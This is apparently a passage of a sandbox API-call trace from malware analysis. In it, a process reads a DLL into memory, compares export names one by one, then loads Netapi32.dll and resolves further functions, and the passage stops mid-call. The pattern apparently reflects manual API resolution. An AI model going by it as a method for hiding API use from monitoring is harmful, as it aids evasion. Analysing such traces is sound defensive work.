0x7ffc5ecfd650 [0289.730] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0289.730] GetProcessHeap () returned 0x540000 [0289.730] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa7b88) returned 0x3a7d010 [0289.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.734] ReadFile (in: hFile=0x17c, lpBuffer=0x3a7d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a7d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0289.833] CloseHandle (hObject=0x17c) returned 1 [0289.833] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0289.834] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.834] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0289.834] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.834] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.834] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0289.834] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.834] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.834] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0289.834] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0289.834] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.834] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.834] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0289.835] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0289.835] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0289.835] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.835] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.835] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0289.835] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0289.835] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.835] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0289.835] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0289.835] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.835] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.836] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0289.836] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0289.836] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.836] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0289.836] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0289.836] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.836] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.837] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.837] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0289.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.837] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0289.838] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.838] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0289.839] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0289.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0289.841] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0289.841] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0289.842] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0289.843] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0289.843] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0289.844] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0289.844] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0289.845] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0289.861] GetProcessHeap () returned 0x540000 [0289.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a7d010 | out: hHeap=0x540000) returned 1 [0289.948] GetProcessHeap () returned 0x540000 [0289.948] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x5592e0 [0289.948] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0289.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.954] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.954] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, 